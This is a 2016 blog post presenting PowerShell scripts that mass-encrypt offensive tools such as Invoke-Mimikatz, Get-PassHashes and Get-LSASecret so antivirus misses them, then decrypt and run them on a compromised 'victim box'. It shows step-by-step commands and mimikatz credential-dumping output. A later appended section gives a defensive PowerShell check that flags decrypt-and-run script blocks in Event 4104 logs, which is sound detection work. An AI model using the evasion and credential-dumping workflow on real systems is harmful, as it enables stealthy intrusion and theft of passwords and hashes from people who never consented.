Wednesday, October 19, 2016

New Powershell Mass Encrypt and Decrypt modules

https://github.com/juushya/Scripts/blob/master/PS-MassEncScript.ps1
https://github.com/juushya/Scripts/blob/master/PS-DecScript.ps1

These scripts are wrappers around PowerSploit's Out-EncryptedScript.ps1.

PowerSploit's Out-EncryptedScript.ps1 encrypts one script at a time; each encrypted file then has to be decrypted manually before it can be executed.

PS-MassEncScript.ps1 encrypts every script in a directory with a single password and salt value in one run.

Move the encrypted files over to the target / compromised box. Because the files are encrypted, AV / IPS signature scanning does not flag them, at least as of this writing.

Use PS-DecScript.ps1 to decrypt and execute any of these encrypted files.

See the example script runs below:

+++++
On Attacker's box

C:\ps_stuff>dir *.ps1
 Volume in drive C has no label.
 Volume Serial Number is 6CCE-B154

 Directory of C:\ps_stuff

10/19/2016  06:51 AM             4,850 Out-EncryptedScript.ps1
10/06/2016  04:42 AM             1,663 PS-DecScript.ps1
10/19/2016  01:56 AM             3,267 PS-MassEncScript.ps1
               3 File(s)          9,780 bytes
               0 Dir(s)  45,774,680,064 bytes free

C:\ps_stuff>
C:\ps_stuff>dir scripts            <--- directory where all scripts to be encrypted are stored
 Volume in drive C has no label.
 Volume Serial Number is 6CCE-B154

 Directory of C:\ps_stuff\scripts

10/19/2016  07:07 AM    <DIR>          .
10/19/2016  07:07 AM    <DIR>          ..
09/09/2016  12:06 PM             8,863 Get-LSASecret.ps1
09/09/2016  11:46 AM            14,948 Get-PassHashes.ps1
09/09/2016  11:38 AM         1,271,440 Invoke-Mimikatz.ps1
               3 File(s)      1,295,251 bytes
               2 Dir(s)  45,776,424,960 bytes free

C:\ps_stuff>

Normally, an AV will immediately flag these scripts, quarantine them and / or block their execution.

Encrypt these scripts using PS-MassEncScript.

C:\ps_stuff>powershell
Windows PowerShell
Copyright (C) 2009 Microsoft Corporation. All rights reserved.

PS C:\ps_stuff> 

Step 1 -> Import PS-MassEncScript.ps1
PS C:\ps_stuff> Import-Module C:\ps_stuff\PS-MassEncScript.ps1

Step 2 -> Execute PS-MassEncScript.ps1 with 4 parameters
PS C:\ps_stuff> PS-MassEncScript C:\ps_stuff\Out-EncryptedScript.ps1 C:\ps_stuff\scripts password salt

Here:
argument 1 -> C:\ps_stuff\Out-EncryptedScript.ps1 -> path to Out-EncryptedScript.ps1
argument 2 -> C:\ps_stuff\scripts -> path to scripts that you want to encrypt
argument 3 -> password
argument 4 -> salt

PS C:\ps_stuff> dir .\scripts

    Directory: C:\ps_stuff\scripts


Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---          9/9/2016  12:06 PM       8863 Get-LSASecret.ps1
-a---        10/19/2016   7:10 AM      12809 Get-LSASecret_evil.ps1
-a---          9/9/2016  11:46 AM      14948 Get-PassHashes.ps1
-a---        10/19/2016   7:10 AM      20925 Get-PassHashes_evil.ps1
-a---          9/9/2016  11:38 AM    1271440 Invoke-Mimikatz.ps1
-a---        10/19/2016   7:10 AM    1696253 Invoke-Mimikatz_evil.ps1

PS C:\ps_stuff>

As shown above, each encrypted script is written next to its original with an _evil suffix.


On the victim box:

Assuming you already have cmd shell access, copy the encrypted files to the victim box.

Format:
.\PS-DecScript.ps1 <evil script name> password salt 'Command passed to evil ps1 script'

PS C:\victim> .\PS-DecScript.ps1 .\Invoke-Mimikatz_evil.ps1 password salt 'Invoke-Mimikatz -DumpCreds'
Executing .\Invoke-Mimikatz_evil.ps1

  .#####.   mimikatz 2.1 (x86) built on Feb 21 2016 18:42:23
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 17 modules * * */

mimikatz(powershell) # sekurlsa::logonpasswords

Authentication Id : 0 ; 117741 (00000000:0001cbed)
Session           : Interactive from 1
User Name         : Administrator
Domain            : win7ent-01-lab
Logon Server      : WIN7ENT-01-LAB
Logon Time        : 10/19/2016 6:47:25 AM
SID               : S-1-5-21-3784992239-1999550448-2462781864-500
        msv :


PS C:\victim> .\PS-DecScript.ps1 .\Get-PassHashes_evil.ps1 password salt 'Get-PassHashes'
Executing .\Get-PassHashes_evil.ps1
...
<hash dump>
...

PS C:\victim>

+++++
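The encrypted file on disk defeats a static scan, but the decrypt step above has to turn the script back into plaintext on the victim and hand it to Invoke-Expression, and the password and salt are passed on the command line. With PowerShell 5.0 or later, script block logging (Event ID 4104) records that plaintext and the decrypt stub itself. The following is an added example, not part of the post or of PowerSploit: it checks constructed script block text for the combination of password-based key derivation, a symmetric cipher and dynamic execution that this decrypt-and-run step leaves behind. The sample blocks, the function name and the indicator set are assumptions.

```powershell
# Added example (not from the post or PowerSploit): flag PowerShell script blocks
# that derive a key from a password and salt, decrypt a blob, and hand the
# plaintext to Invoke-Expression, which is the shape of the decrypt-and-run step.
# In production, read the text from Event ID 4104 in the
# Microsoft-Windows-PowerShell/Operational log; here the events are constructed.

# Constructed: a benign script block.
$Benign = 'Get-ChildItem C:\Windows -Filter *.log | Measure-Object'

# Constructed: a fragment with the decrypt-and-run shape (hypothetical, not the
# real decryptor). Note that the password and salt appear in the clear.
$DecryptStub = @'
$Kdf   = New-Object Security.Cryptography.Rfc2898DeriveBytes('password', [Text.Encoding]::UTF8.GetBytes('salt'))
$Aes   = New-Object Security.Cryptography.AesManaged
$Blob  = [Convert]::FromBase64String((Get-Content .\Invoke-Mimikatz_evil.ps1))
$Plain = [Text.Encoding]::UTF8.GetString($Aes.CreateDecryptor().TransformFinalBlock($Blob, 0, $Blob.Length))
Invoke-Expression $Plain
'@

$ScriptBlocks = @(
    [pscustomobject]@{ Id = 1; Text = $Benign }
    [pscustomobject]@{ Id = 2; Text = $DecryptStub }
)

# Each indicator is one regex; an alert requires all three classes in one block.
$Indicators = @(
    @{ Name = 'KeyDerivation';   Pattern = 'Rfc2898DeriveBytes|PasswordDeriveBytes' }
    @{ Name = 'SymmetricCipher'; Pattern = 'AesManaged|RijndaelManaged|AesCryptoServiceProvider|CreateDecryptor' }
    @{ Name = 'DynamicExec';     Pattern = '\bInvoke-Expression\b|\biex\b' }
)

function Test-RuntimeDecryptStub {
    param([Parameter(Mandatory)][string]$Text)
    $hits = @(foreach ($i in $Indicators) { if ($Text -match $i.Pattern) { $i.Name } })
    [pscustomobject]@{
        Suspect    = ($hits.Count -eq $Indicators.Count)
        Indicators = $hits
    }
}

foreach ($b in $ScriptBlocks) {
    $r = Test-RuntimeDecryptStub -Text $b.Text
    if ($r.Suspect) {
        "ALERT block {0}: runtime decryption feeding Invoke-Expression ({1})" -f $b.Id, ($r.Indicators -join ', ')
    } else {
        "ok    block {0}" -f $b.Id
    }
}
```

Block 2 is reported as an alert and block 1 as ok; the same three-way check applies to the script block text of real 4104 events once it is read from the event log.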
